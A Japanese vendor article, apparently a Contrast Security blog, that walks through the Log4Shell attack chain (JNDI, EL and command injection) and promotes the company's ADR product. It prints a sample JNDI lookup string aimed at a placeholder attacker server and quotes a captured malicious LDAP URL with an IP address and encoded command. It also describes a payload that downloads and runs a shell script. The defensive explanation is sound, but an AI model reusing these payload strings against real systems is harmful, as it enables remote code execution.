攻撃の仕組み

今日の急速に進化するサイバー脅威の状況において、組織はアプリケーションを標的としたますます高度な攻撃に直面している。こうした脅威と、それらに対抗するために設計されたテクノロジを理解することは極めて重要だ。この記事では、よく知られたLog4Shellの脆弱性を例に挙げ、一般的なアプリケーション攻撃のメカニズムを深く掘り下げる。実際の攻撃例を用いて、この脆弱性がどのように最初に悪用されて悪用の連鎖につながるかも探り、Contrast SecurityのADR(アプリケーションにおける検知と対応)テクノロジがこのようなゼロデイ脅威に対して効果的に防御する方法を実証してみよう。

また、リスクの軽減、コストの削減、コンプライアンスの向上など、ADRのビジネス上の利点についても焦点を当てる。ADRの利点とその実際の影響を理解することで、組織はアプリケーションセキュリティ(AppSec)の体制を強化し、新たな脅威に先んじるための情報に基づいた意思決定を行うことができる。

ADR vs 既存のサイバーセキュリティ機能

既存のアプローチの限界

ADRの詳細を説明する前に、多くの組織のセキュリティ戦略における重大なギャップ、つまり、アプリケーションレベルでの強力な脅威検知の機能が欠けていることに、どう対処するかを理解することが重要だ。

Webアプリケーションファイアウォール(WAF)

多くの組織は、アプリケーションレベルの脅威に対する主要な防御策としてWAFに依存している。しかし、このアプローチには重大な制限がいくつかある。

• ネットワークレベルに焦点：WAFはネットワークレベルで動作し、侵入トラフィックのパターンを分析して潜在的な脅威を検出する。これは既知の攻撃シグネチャに対して有効な場合もあるが、アプリケーション自体内で何が起こっているかについての可視性が限られてしまう。
• 誤検知：WAFにはアプリケーション固有のコンテキストがないため、多くの場合、過検知が大量に発生する。これはセキュリティ担当に負担をかけ、不要なアラートにつながる可能性がある。
  
• バイパス手法への脆弱性：おそらく最も重大な点は、WAFバイパス手法が驚くほど簡単に実行できることだ。攻撃者は、エンコードのバリエーション、プロトコルレベルの回避、ペイロードのパディング、またはネットワークレベルでは見えないアプリケーションの欠陥の悪用などの手法を利用して、WAFの保護を回避できることが多い。
• 効果的でないSOC統合：組織がWAFを導入していても、セキュリティオペレーションセンター(SOC)に、アプリケーションレベルの詳細情報を提供するようにWAFを構成できていない場合が多い。これにより、脅威の検知・対応能力に大きなギャップが生まれる。

技術注記：WAFは、Webアプリケーションとの間のHTTPトラフィックを監視、フィルタリング、ブロックするセキュリティツール。ネットワークレベルで動作し、クロスサイトスクリプティング(XSS)やSQLインジェクションなど、さまざまな攻撃からWebアプリケーションを保護することを目的としている。

技術注記：WAFバイパスとは、攻撃者がWAFのセキュリティ制御を無効にするために使用する手法のこと。WAFのシグネチャベースの保護をすり抜けて悪意のあるペイロードを侵入させる方法や、アプリケーションへのWAFエントリポイントを完全に回避する方法などが含まれる。AppSecに関しては多層防御戦略をとり、アプリケーション層のセキュリティを確保するために単一の制御に依存しないことが重要である。

エンドポイントにおける検知と対応(EDR)

EDRソリューションは、組織内の個々のエンドポイント(コンピュータやモバイルデバイスなど)の監視と保護に重点を置いている。EDRはセキュリティ全体にとって重要だが、アプリケーションセキュリティに関しては、以下のような独自の制限がある。

• エンドポイントのアクティビティに焦点：EDRは、主にシステムレベルのイベントとプロセスを監視し、アプリケーション固有の動作は監視しない。
• アプリケーション内部の可視性が低い：EDRソリューションでは、アプリケーションの内部動作を把握できない。
• 事後対応型：EDRでは、エンドポイント上で脅威が既に実行された後に、その脅威が検知されることがよくある。
• クラウドとWebアプリケーションの適用範囲におけるギャップ：アプリケーションがクラウドベースのサービスに移行するにつれて、従来のEDRソリューションにはギャップが生じる可能性がある。

技術注記：EDRは、コンピュータ、ラップトップ、モバイルデバイスなどのエンドポイントデバイスに対する脅威を継続的に監視し、対応するサイバーセキュリティ技術。EDRソリューションは、エンドポイントからデータを収集して分析し、セキュリティオペレーショ担当が疑わしいアクティビティや潜在的なセキュリティ侵害を検出、調査、軽減できるようにする。通常、リアルタイムの可視性、脅威の検出、自動化された対応機能を提供し、アプリケーション固有の動作ではなく、エンドポイントレベルのアクティビティに重点を置いている。

ADRの利点

ADRテクノロジは、アプリケーション自体の内部で動作することで、こうした制限に対処する。このアプローチには、いくつかの重要な利点がある。

• アプリケーションの高度な可視性：ADRはネットワークレベルのソリューションでは実現できないレベルの可視性を提供し、コードの実行やデータフローを把握できる。
• コンテキスト認識型の検知：ADRは、アプリケーションの動作を理解することで、正当な動作と真の脅威をより正確に区別することができ、誤検知を大幅に削減できる。
• ゼロデイ脆弱性に対する保護：ADRの高度なアプリケーションの洞察により、新しい攻撃パターンを検知・対応することで、ゼロデイ脆弱性に対する保護を強化できる。
• WAFバイパスに対する多層防御：ADRは、WAFの保護をバイパスした脅威を検出できる重要な第2の防御線として機能できる。
• 豊富で実用的なインテリジェンス： ADRは、アプリケーションレベルの脅威に関する詳細で豊富なコンテキスト情報をSOCチームに直接提供し、可視性のギャップを解消して、より効果的な脅威対応を可能にする。

ADRを実装することで、組織はセキュリティ体制におけるこの重要なギャップを埋め、既存のソリューションでは見逃してしまう可能性のある、高度なアプリケーションレベルの脅威を検知・対応することができる。

技術注記：ADRは、アプリケーションレベルで脅威を検知して対応することに重点を置いたセキュリティアプローチである。ネットワークレベルで動作する他のAppSec対策とは異なり、ADRはアプリケーション自体の内部で動作するため、アプリケーションの動作をより詳細に把握でき、脅威をより正確に検知できる。

技術注記：ゼロデイ脆弱性とは、ソフトウェアベンダーに知られておらず、まだパッチが適用されていないソフトウェアのセキュリティ上の欠陥である。このような脆弱性は、ベンダーが気づいて修正を急ぐ前に、攻撃者によって悪用される可能性がある。

最新のアプリケーション攻撃の仕組み：Log4Shell

現代のアプリケーション攻撃の複雑さと深刻さを説明するために、2021年後半にサイバーセキュリティの世界に衝撃を与えた悪名高いLog4Shellの脆弱性(CVE-2021-44228)に対する攻撃を見てみよう。この攻撃は、JNDIインジェクション、EL(式言語)インジェクション、およびコマンドインジェクションを利用した攻撃チェーンの代表的な例である。

技術注記：CVEプログラムは、公開されているコンピュータセキュリティの欠陥をカタログ化したもので、MITREによって管理されている。CVEの各エントリには固有の識別子があるため、IT専門家はさまざまなセキュリティツールやサービス間で脆弱性に関する情報を簡単に共有できる。

ステップ1：脆弱性の悪用

Log4Shellの脆弱性は、どこにでも存在する一般的なJavaロギングフレームワークであるLog4jに影響を与える。この攻撃は、悪意のある者が脆弱なアプリケーションに特別に細工されたリクエストを送信することから始まる。このリクエストには、次のような形式のJNDI(Java Naming and Directory Interface)ルックアップを実行させる文字列が含まれている。

${jndi:ldap://attacker-controlled-server.com/payload}

技術注記：JNDI(Java Naming and Directory Interface)は、Javaアプリケーションにネーミングおよびディレクトリ機能を提供するJava APIである。Javaアプリケーションが名前を使用してデータやオブジェクトを検出したり検索することを可能にするもので、Log4Shellなどの特定の脆弱性に悪用される可能性がある。このコンテキストでは、悪意のあるサーバへの接続を開始するために悪用されている。

ステップ2：JNDIルックアップと式言語の評価

脆弱なバージョンのLog4jでこの文字列が処理されると、${jndi:...}の部分が評価する式として解釈される。この評価により、アプリケーションでJNDIルックアップが実行され、文字列に指定された攻撃者が制御するLDAP(Lightweight Directory Access Protocol)サーバにアクセスすることになる。

技術注記：Log4j は、Apacheによって開発された一般的なJavaベースのロギングフレームワーク。さまざまな種類のデータやイベントをログに記録するために、Javaアプリケーションで広く使用されている。

ステップ3：悪意のあるペイロードの取得

攻撃者のLDAPサーバは、EL(式言語)インジェクションのペイロードを返す。JNDIが持つ性質とLog4jの応答処理方法により、このペイロードは評価されるEL式として扱われる。

ステップ4：ELインジェクション

攻撃者は通常、ELインタープリタを悪用するために、EL式に悪意のあるコードを埋め込む。これには、追加のマルウェアをダウンロードして実行したり、データを抜き取ったり、システムにバックドアを仕込んだりするためのコマンドが含まれる可能性がある。

技術注記：EL(式言語)は、アプリケーションデータへのアクセスを可能にするスクリプト言語。 ELインジェクションは、攻撃者が悪意のあるEL式を操作または挿入できる場合に発生し、コードの実行につながる可能性がある。ELインジェクションの脆弱性は、この例のように、直接的または間接的に連鎖攻撃を通じて、ゼロデイ脆弱性の中で繰り返し発生するテーマである。

ステップ5：コードの実行

挿入された式がELインタープリタで評価されると、影響を受けるアプリケーションのコンテキスト内で悪意のあるコードが実行される。これにより、攻撃者はシステムに足がかりを得て、多くの場合、アプリケーション自体と同じ権限でアクセスできるようになる。

Log4Shellの脅威と危険性

Log4Shellの脆弱性を特に深刻にしているのは、Log4jライブラリの広範な使用と脆弱性の悪用の容易さであり、以下の懸念事項がある。

1. 広範な攻撃対象：Log4jは多くのJavaアプリケーションやフレームワークで使用されているため、この種の脆弱性は広く存在する。
2. リモートコード実行：関連するJNDIインジェクションは、リモートコード実行(RCE)に直接つながる可能性があり、攻撃者は脆弱なシステムを大幅に制御できる。
3. 検知が困難：Log4Shellの脆弱性に対する攻撃は難読化される可能性があるため、ネットワークレベルの保護の単純なパターンマッチングでは検知するのが困難だ。
4. 連鎖攻撃：JNDIインジェクション攻撃は、ELインジェクションやコマンドインジェクションなどの他の手法と連鎖させて、より複雑な攻撃を仕掛けることができる。

Log4Shell攻撃の仕組みを見ると、アプリケーション層の攻撃がなぜこれほど強力であるのか、そしてこのような高度な攻撃を検知して防ぐためにADRのような保護メカニズムがいかに重要であるかが分かるだろう。

足がかりから目標達成へ

最初のアクセスが確立すると、攻撃者はこの立場を利用して、他の目的を達成するための追加の戦術を使用することができる。例えば、以下のようなものだ。

• 権限昇格：攻撃者は、ローカルの脆弱性を悪用して、侵害されたシステムでより高い権限を取得する可能性がある。
• 偵察: 攻撃者は昇格したアクセス権を使用して、他の脆弱なシステムや貴重なデータがないか、内部ネットワークを調査することができる。
• 資格情報の収集：侵害されたシステムを使用して、メモリや設定ファイルに格納されているログイン資格情報を抜き取る可能性がある。
• 別のシステムへのアクセス： 攻撃者は、収集した資格情報を使用するか、または他の脆弱性を悪用して、ネットワーク内の他のシステムを侵害する可能性がある。
• データ流出やランサムウェアの展開：攻撃者は、その目的に応じて、機密データを盗んだり、侵害されたネットワーク全体にランサムウェアを展開したりする可能性がある。

Contrast ADRの活用

Contrast Securityのランタイムセキュリティプラットフォームには、革新的なADR技術が採用されており、Log4Shellのような攻撃を複数の段階で検知して防ぐことができる。Log4Shellを防ぐ話しに入る前に、それを可能にするアーキテクチャについて理解しておこう。

Contrast ADRアーキテクチャ

Contrast ADRは、エージェントベースのアーキテクチャを使用し、アプリケーションのランタイムと直接統合している。

• エージェントの導入： アプリケーションのランタイム環境(Javaアプリケーションの場合はJava仮想マシン[JVM]など)に軽量なエージェントを導入。
• ランタイムの統合： アプリケーションの動作をリアルタイムで監視・分析するよう、エージェントはアプリケーションコードとシームレスに統合。
• インストゥルメンテーション：アプリケーションのソースコードを変更することなく、インストゥルメント技術によって、コードの実行、データフロー、APIコールを監視。
• 応答メカニズム： 脅威の検知時に、悪意のあるアクティビティをブロックしたり、セキュリティ担当への警告など、即座な対応が可能。

このようなアーキテクチャにより、Contrastのランタイムセキュリティは、攻撃の複数の段階で高度な可視性と正確な保護を提供できる。これが実際にどのように機能するかを見てみよう。

Log4Shellに対する多段階の保護

第1段階：JNDIインジェクションの検知

Contrastのランタイムセキュリティにより、悪意のあるJNDIルックアップの試行は次の方法で特定される。

• JNDIインジェクション対策：JNDI機能の悪用を防ぐために、JVMのセキュリティ設定を強化することで、攻撃を検知。

第2段階：ELインジェクションの検知

Contrastのランタイムセキュリティにより、ELインジェクションの試行は、次の方法で特定されて保護される。

• ELインジェクション対策： JVMのELプロセッサ機能の悪用を防ぐために、JVMのセキュリティ設定を強化することで、攻撃を検知。

第3段階：コード実行のブロック

万が一、悪意のあるコードが読み込まれた場合に備え、Contrastランタイムセキュリティプラットフォームでは、以下が活用される。

• コマンドインジェクション保護：分類、トレース、およびセマンティック解析技術を活用し、攻撃者のペイロードが機密性の高いAPIに到達するのを防ぐ。
• プロセスの強化：コマンド実行に関連するJVMの機密APIの悪用を防ぐために、JVMのセキュリティ設定を強化する。

実例：Log4Shell攻撃の検知と解析

ContrastのADRテクノロジが実際にどのように機能するかをより深く理解するために、再現したLog4Shell攻撃の検知イベントの一連のスクリーンショットを見ていこう。

注：この例では、攻撃者の攻撃連鎖とContrastのADRの多層防御検知機能を説明するために、すべての動作ルールを「ブロック」モードではなく「監視」モードに設定している。通常、これらのルールは「ブロック」モードに設定し、最初のJNDI攻撃をキャッチしてブロックして、後続のイベントが最初に発生するのを防ぐ。

第1段階：JNDIインジェクション

攻撃検知

最初のスクリーンショットでは、Contrast ADRによりJNDIインジェクションの試みが特定されていることが分かる。

• イベントはEXPLOITED(攻撃検出済)としてマークされている。これは攻撃の試みが成功したことを示す。
• 攻撃の送信元IPが0.0.0.0として表示されている。これには通常、攻撃の送信元のIPが含まれるが、この例の場合、実際の攻撃のローカルでの再現であるため、IPアドレスは脆弱なアプリケーションをホストしているのと同じシステムからのものとなっている。
• 攻撃者が制御する以下のLDAPサーバにInitialContextルックアップをリダイレクトしようとする試みが、Contrast ADRによって検知された：

ldap://143.110.184.204:1389/TomcatBypass/Command/Base64/Y2QgL3RtcCB8fCB…

このLDAP URLは、攻撃者が悪意のあるサーバへのJNDIルックアップを開始しようとするLog4Shell攻撃の試行の特徴を示している。

コード実行の詳細

2番目のスクリーンショットは、攻撃の詳細なスタックトレースを提供する。

• JNDIルックアッププロセスを通じて攻撃が進行していることが分かる。
• スタックトレースは、Log4jライブラリコード、特にJndiManager.lookupおよびJndiLookup.lookupメソッドの関与を示している。
• これは、この攻撃で脆弱なLog4jコンポーネントが悪用されていることを確認している。

技術注記：上のスクリーンショットに示されている一連のメソッド呼び出しに慣れていない方のために、これはスタックトレースだ。 このスタックトレースは、ContrastのADRが攻撃を検出したときにアプリケーションが実行中であったコード実行のスナップショットとなる。スタックトレースでは、メソッドの呼び出し順序は下から上であり、上から下ではありません（通常は上から下へ読む）。これは、開発者以外の人にとっては混乱を招く可能性がある。これを、積み重ねられたプレートと考えてほしい。最新のプレートが一番上にある。

第2段階：ELインジェクション

攻撃検出

3番目のスクリーンショットは、攻撃者制御のサーバーからダウンロードされた悪意のあるペイロードの内容を明らかにしている。

• ContrastのADRは、ELインジェクションイベントを識別した。
• 評価された式は、Javaクラスローディングを使用して、JVMに埋め込まれたJavaScriptエンジンをロードする。
• ペイロードはJavaScriptを使用して、システムコマンドを実行するための悪意のある配列を作成する。
• Unixライクなシステム(/ bin / bash)とWindows(cmd)の両方で動作するロジックが含まれており、攻撃者がクロスプラットフォームでの悪用を試みていることを示している。

コード実行の詳細

4番目のスクリーンショットは、ELプロセッサの呼び出しを含むコードレベルの詳細を示している。

• javax.el.ELProcessor.evalメソッドが呼び出されていることがわかる。
• これは、悪意のあるELペイロードがJavaコードによって実行される場所です。 このステージは、検出されずにブロックされない場合、攻撃者のコードがアプリケーションのコンテキスト内で実行されるポイントを表している。

第3段階：コマンドインジェクション

攻撃検出

攻撃検出5番目のスクリーンショットは、JavaScriptペイロードに埋め込まれたコマンドの呼び出しを示している。

• Contrast ADRは、コマンドインジェクションイベントを識別しました。
• コマンドは、攻撃者制御のサーバーからシェルスクリプト（aktualisieren.sh）をダウンロードして実行しようとします。

コード実行の詳細

最後のスクリーンショットは、Runtime.execを使用してProcessBuilder.startを呼び出すJavaScriptコードの呼び出しとプロセスのフォークを示しています。

• Nashornスクリプトエンジンが呼び出され、コマンド配列を含む悪意のあるペイロードコードを評価していることがわかる。
• これにより、Javaランタイムが悪意のあるシェルスクリプトをダウンロードして実行するプロセスを分岐する。
• このステージは、検出されない場合、攻撃者がターゲットアプリケーションサーバーにマルウェアペイロードをダウンロードして爆発させるポイントを表す。
• プロセスがフォークされると、EDRシステムが攻撃の検出を開始する可能性がある。存在を隠そうする洗練された攻撃者は、検出される可能性が低いアプリケーション層内で動作することを好むため、このアクションを実行しない可能性がある。

テクニカルノート: Nashornスクリプトエンジンは、バージョン15のJavaから削除されました。これにより、新しいバージョンのJavaを使用している場合、この特定の攻撃ペイロードは無効になる。ただし、攻撃者は、新しいバージョンのJavaでこの脆弱性を悪用するために、他の手法を使用する可能性がある。

攻撃検出の概要

この詳細な内訳は、Contrast ADRの次の能力を示す。

1. 初期のJNDIインジェクション試行を検出する
2. 複数の実行段階で攻撃を追跡する
3. 悪意のあるペイロードを識別して分析する
4. 初期攻撃から潜在的なコード実行まで、攻撃チェーンへの深い可視性を提供する

このレベルの洞察は、攻撃の防止と新しい脅威パターンの理解の両方に不可欠です。

Log4Shell攻撃に対するADRの対応

Contrast ADRが潜在的なLog4Shell攻撃の試行を検出すると、NISTサイバーセキュリティフレームワークに沿った包括的な対応がトリガーされる。ADRが通常どのように応答するかは次のとおりだ。

特定

• ランタイムソフトウェア構成分析(SCA)を使用して、アプリケーション環境を継続的にマッピングおよびインベントリし、脆弱なLog4jインスタンスを識別する。
• 攻撃の試行中のアプリケーションの動作とデータフローへのリアルタイムの可視性を提供する。

保護

• ブロッキングモードの場合、悪意のあるサーバーへの初期のJNDIルックアップを防止する。
• JVMセキュリティ設定を強化してJNDI機能を制限し、攻撃対象領域を削減する。

検出

• 悪意のあるLDAPサーバーへのJNDIルックアップ試行を識別して警告する。
• 悪意のあるELペイロードを実行しようとする試みを検出する。
• 不正なJavaクラスのロードと実行を監視する。
• コマンドインジェクションを示す疑わしいプロセス実行を識別する。

対応

• Log4Shellインシデントの事前定義されたランブックの使用をトリガーします。
• 以下を含む、強化されたトリアージコンテキストを提供します。
  
  • JNDIルックアップから潜在的なコード実行までの詳細な攻撃チェーン分析
  • 影響を受けるアプリケーションコンポーネントと潜在的な影響
• SIEM / XDRシステムと統合し、より効果的なインシデント分析のために、アプリケーション層のコンテキストでアラートを強化する。

修復

• 攻撃の試みについての詳細なフォレンジックデータを提供することにより、インシデント調査をサポートする。
• アプリケーションポートフォリオ全体で潜在的な侵害の全範囲を特定するのを支援する。
• 検出と保護の機能を向上させるためのインシデント後の分析を促進する。
  
  • インシデント対応の有効性に基づいてランブックを更新する
  • 攻撃の将来のインスタンスをキャッチするためにルールポリシーを調整する
• 根本原因分析をサポートするデータを提供し、将来同様のインシデントを防ぐのに役立つ。

このプロセス全体を通して、ADRシステムは次のことを実施する。

• 継続的な監視を維持する。
• セキュリティダッシュボードにリアルタイムの更新を提供し、技術チームと管理者の両方に進行中の状況を明確に把握できるようする。
• 実行されたすべての検出および対応アクションを文書化することにより、コンプライアンスレポートをサポートする。

この包括的なADRアプローチにより、Log4Shell攻撃の試みに対する迅速で協調的な対応が保証され、自動化とより広範なセキュリティエコシステムとの統合を活用して、リスクを最小限に抑え、迅速な回復をサポートする。

技術注記：SIEM (Security Information and Event Management) は、組織のITインフラストラクチャ全体のさまざまなソースからログデータを収集して分析するシステムだ。アプリケーションやネットワークハードウェアによって生成されたセキュリティアラートのリアルタイム分析に役立つ。SIEMの例としては、Splunk、QRadar、Microsoft Sentinelなどがある。

技術注記：XDR (Extended Detection and Response) は、複数のセキュリティ層（電子メール、エンドポイント、サーバー、クラウドワークロード、ネットワーク）にわたってデータを収集して自動的に関連付ける、全体的なセキュリティアプローチだ。分析を使用して脅威を検出し、それらに自動的に対応することで、ITエコシステム全体でサイバーセキュリティインシデントを検出、調査、および対応するためのより包括的で効率的な方法を提供する。

ContrastのADRアプローチの利点

Contrast ADRによって提供される詳細な攻撃チェーン分析には、いくつかの利点がある。

• 深い可視性: ネットワークベースのツールとは異なり、Contrast ADRはアプリケーションの内部プロセスを把握し、正確な攻撃検出を可能にする。
• コンテキストを認識した保護: アプリケーションの通常の動作を理解することにより、Contrastは正当なアクションと攻撃の試みを正確に区別する。
• リアルタイム分析: リアルタイムで攻撃を分析およびブロックする機能により、ゼロデイ脆弱性であっても攻撃の成功を防ぐ。
• 実用的なインテリジェンス: 詳細なイベント情報は、セキュリティチームが攻撃の性質を理解し、全体的なセキュリティ体制を改善するのに役立つ。
• 最小限の誤検知: 攻撃の複数の段階を関連付けることにより、Contrast ADRは真の脅威を確実に特定し、セキュリティチームのアラート疲労を軽減できる。

Contrast ADR vs その他セキュリティ対策

ContrastのADRソリューションは、Webアプリケーションファイアウォール(WAF)やEDR製品などの他のセキュリティツールに比べて、いくつかの利点を提供する。

• アプリ内インテリジェンス: ネットワークトラフィックを分析するWAFとは異なり、Contrast ADRはアプリケーション内で動作し、データフローとコード実行をより深く把握できる。
• コンテキストを認識した保護: ContrastのADRはアプリケーションの動作を理解しているため、より正確な脅威検出と誤検知の削減が可能である。
• ゼロデイ脆弱性保護: Contrast ADRは、パッチが利用可能になる前に多数のCVEから保護してきたことからもわかるように、ゼロデイ脅威を防ぐ能力を実証できる。
• パフォーマンスの最適化: アプリケーションの共有メモリ内で動作することにより、Contrast ADRはパフォーマンスへの影響を最小限に抑える。
• カスタマイズ可能なポリシー: Contrastでは、特定のアプリケーションのニーズに合わせて、保護ルール、CVEシールド、仮想パッチ、ログエンハンサーを微調整できる。

ADRのビジネス上の利点

ContrastのADR技術を実装すると、具体的なビジネス上の利点につながる。

• リスクの軽減: 多層でコンテキストを認識した保護を提供することにより、ADRは攻撃の成功のリスクを大幅に削減し、組織のデータと評判を保護する。
• 総所有コストの削減: 誤検知が少なく、自動化された保護により、セキュリティチームは優先度の高い問題に集中できるため、運用コストを削減できる。
• コンプライアンス体制の改善: ADRの包括的な保護と詳細なロギングは、PCI DSSやGDPRなどのさまざまなコンプライアンス要件を満たすのに役立つ。
• 市場投入までの時間の短縮: アプリケーションを内部から保護することにより、ADRは、セキュリティを損なうことなく、開発チームがより迅速に移動できるようにし、「Secure by Design」の原則に沿っている。
• 可視性の向上: ADR技術によって提供される深い洞察は、全体的なセキュリティ体制を改善し、戦略的なセキュリティの意思決定を促進する。

注: PCI DSS (Payment Card Industry Data Security Standard)は、クレジットカード情報を受け入れる、処理する、保存する、または送信するすべての企業が安全な環境を維持することを保証するために設計された一連のセキュリティ基準だ。:  is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.

注: GDPR (General Data Protection Regulation) は、欧州連合および欧州経済地域におけるデータ保護とプライバシーに関するEU法の規制だ。また、EUおよびEEA地域外への個人データの転送にも対処している。

実際の影響: Log4Shellの例

Log4Shellの脆弱性が公開されたとき、世界中の組織はシステムにパッチを適用してリスクを軽減しようと奔走した。しかし、ADRを使用しているContrast Securityの顧客は、この重大な脆弱性からすでに保護されていた。

Contrast ADRの多層セキュリティアプローチは、脆弱性が公に知られる前でさえ、次のことができた。

1. 悪意のあるELインジェクション攻撃を検出してブロックする
2. 不正なクラスのロードとデシリアライゼーションを防止する
3. リモートコード実行の試みを阻止する
4. Log4shellの露出と攻撃を可視化する

この予防的な保護は、最も洗練された、これまで知られていなかった脅威からアプリケーションを保護するADR技術の威力を浮き彫りにしている。しかし、Log4Shellはほんの一例だ。

この技術によって提供されるゼロデイ保護の他の注目すべき例としては、以下のようなものがある。

SIEM / XDRエコシステムとのADR統合

アプリケーション検知および対応(ADR)技術と、既存のセキュリティ情報およびイベント管理(SIEM)および拡張検知および対応(XDR)システムとの統合により、全体的なセキュリティ運用を強化する強力な相乗効果が生まれる。ADRがSIEM / XDR主導のワークフローにどのように適合し、それを強化するかは次のとおりだ。

インシデント対応と分析の強化

• アラートの相関: ADRによって生成されたアラートは、SIEM / XDRのネットワークレベルのイベントと自動的に相関付けられ、潜在的な攻撃の包括的なビューを提供する。
• 根本原因分析: ADRの詳細なコード実行トレースと継続的な監視により、セキュリティインシデントの根本原因分析をより効果的に行うことができる。

動的なセキュリティ制御

• 適応ブロッキング: SIEM / XDRは、脅威インテリジェンスまたは行動分析に基づいて、ADRを監視モードからブロッキングモードに動的に切り替えることができる。
• 仮想パッチ: 新しく発見された脆弱性を軽減するために、SIEM / XDRによって調整されたADRを介した仮想パッチの迅速な展開。
• ログの強化: 必要に応じて、特定の種類のイベントに関するより詳細な情報を収集するために、ADRのログエンハンサーを動的にアクティブ化する。

協調的な脅威の軽減

• クロスプラットフォームIPブロッキング: ADRを介したアプリケーションレベルのブロッキングを含む、複数の層にわたる悪意のあるIPアドレスの協調ブロッキング。
• コンテキスト対応: ADRは、より微妙で効果的な対応戦略のために、アプリケーション固有のコンテキストを提供する。

合理化されたセキュリティ開発コラボレーション

• 脆弱性レポート: 詳細で優先順位付けされた脆弱性レポートが生成され、開発チームに送信される。
• 統合されたチケット発行: バグレポートまたはセキュリティチケットを作成し、セキュリティチームと開発チーム間のコミュニケーションを合理化する。

例: ゼロデイ攻撃への対抗

1. ADRは、アプリケーション層のライブラリコンポーネント内で奇妙なELインジェクションアクティビティを検出し、悪用の可能性を示す
2. SIEM / XDRは、これをゼロデイ脆弱性に関する最近の脅威インテリジェンスと相関付ける。
3. 手動または自動応答により、次の1つ以上のアクションがトリガーされる。
   
   1. ADRは、影響を受けるコンポーネントのELインジェクションルールをブロッキングモードに切り替える。
   2. 仮想パッチがADRを介して展開される。
   3. ログの強化がアクティブになる。
   4. 開発チームに詳細なレポートが通知される
4. SIEM / XDRは、ADRのログを使用して、進行中の分析とさらなる対応の改善を行う。

ADRをSIEM / XDRエコシステムに統合することにより、組織はより包括的な脅威検出、より迅速なインシデント対応、およびより効果的な脆弱性管理を実現し、全体的なセキュリティ体制を大幅に強化する。

結論

サイバー脅威が進化し続けるにつれて、ネットワークベースのAppSec対策は、重要なアプリケーションとデータを保護するのに十分ではなくなった。ContrastのADR技術は、AppSecへの堅牢でインテリジェントで予防的なアプローチを提供する。

最新の攻撃の構造を理解し、最先端のADRソリューションを活用することにより、組織はセキュリティ体制を大幅に強化し、リスクを最小限に抑え、新たな脅威の一歩先を行くことができる。セキュリティの意思決定者として、ADR技術への投資は単なるセキュリティ対策ではなく、今日の脅威の状況において組織のデジタル資産を保護するための戦略的要件だ。

次のステップ

ADR技術が組織をどのように保護できるかについて詳しく知りたい場合は、以下を実行する。

• Contrast ADRのデモをリクエストして、その機能を実際に確認する。
• 現在のAppSec体制のリスク評価を実施する。
• Contrast Securityの専門家と協力して、特定のセキュリティニーズとADRがそれらにどのように対処できるかについて話し合う。

これらの手順を実行することで、AppSecを強化し、進化するサイバー脅威の一歩先を行くことができる。

Read more: 

• ADRホワイトペーパー：アプリケーションにおける検知と対応(ADR)の事例
• Contrast explainer video: Contrast Application Detection and Response (ADR)
• Contrast解説ビデオ：Contrast Security ADR Demo
• Contrastプレスリリース：Contrast Security Application Detection and Response (ADR) Praised by Industry Analysts for Addressing Gap in Cybersecurity Defenses 
• Contrastプレスリリース：Contrast Security Introduces Application Detection and Response (ADR) to Identify and Block Attacks and Zero Days on Applications in Production 
• Contrast用語集：What is ADR?
• Contrastブログ：Contrastが提唱するADR(アプリケーションにおける検知と対応)
• Contrastブログ：Contrast Securityの創設者、Jeff Williamsが本番環境のAppSecの解決策について解説
• Contrastブログ：Contrast ADRでアプリケーションとAPIセキュリティのギャップを埋める5つの方法
• Contrastブログ：ADRの検知層と対応層について理解する
• Contrastブログ：ADRがサイバーセキュリティ界を熱くする理由
• Contrast glossary: What is cross-site scripting?
• Contrast blog: 8月の攻撃データ:数字の先を見る